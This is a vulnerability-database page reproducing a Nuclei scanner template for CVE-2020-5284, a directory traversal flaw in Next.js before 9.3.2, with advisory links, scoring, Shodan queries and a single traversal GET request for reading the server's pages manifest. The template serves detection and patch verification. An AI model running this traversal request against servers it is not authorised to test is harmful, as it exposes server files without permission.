| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2020-5284 | 30 Mar 202000:00 | – | attackerkb | |
| ZEIT Next.js path traversal vulnerability | 31 Mar 202000:00 | – | cnvd | |
| CVE-2020-5284 | 30 Mar 202020:40 | – | cve | |
| CVE-2020-5284 Directory Traversal in Next.js versions below 9.3.2 | 30 Mar 202020:40 | – | cvelist | |
| Directory Traversal in Next.js | 30 Mar 202020:40 | – | github | |
| Path Traversal | 6 Apr 202018:29 | – | nodejs | |
| CVE-2020-5284 | 30 Mar 202022:15 | – | nvd | |
| GHSA-FQ77-7P7R-83RJ Directory Traversal in Next.js | 30 Mar 202020:40 | – | osv | |
| Directory traversal | 30 Mar 202022:15 | – | prion | |
| CVE-2020-5284 | 22 May 202515:38 | – | redhatcve |
id: CVE-2020-5284
info:
name: Next.js <9.3.2 - Local File Inclusion
author: rootxharsh,iamnoooob,dwisiswant0
severity: medium
description: Next.js versions before 9.3.2 are vulnerable to local file inclusion. An attacker can craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory.
impact: |
An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
remediation: This issue is fixed in version 9.3.2.
reference:
- https://github.com/zeit/next.js/releases/tag/v9.3.2
- https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj
- https://nvd.nist.gov/vuln/detail/CVE-2020-5284
- https://github.com/Z0fhack/Goby_POC
- https://github.com/merlinepedra/nuclei-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2020-5284
cwe-id: CWE-22,CWE-23
epss-score: 0.43426
epss-percentile: 0.98577
cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: zeit
product: next.js
shodan-query:
- http.html:"/_next/static"
- cpe:"cpe:2.3:a:zeit:next.js"
fofa-query: body="/_next/static"
tags: cve,cve2020,nextjs,lfi,zeit,vuln,vkev
http:
- method: GET
path:
- "{{BaseURL}}/_next/static/../server/pages-manifest.json"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "application/json"
- type: regex
part: body
regex:
- '\{"/_app":".*?_app\.js"'
- type: status
status:
- 200
# digest: 4b0a00483046022100d68dc0429e724a0d87589985f4caecdfd606c6017fd4f98286fc62ea5f7fa38a022100cf33f43842d470f6b031472dea64f3c9529d0615f55210068313243fcfd00e38:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation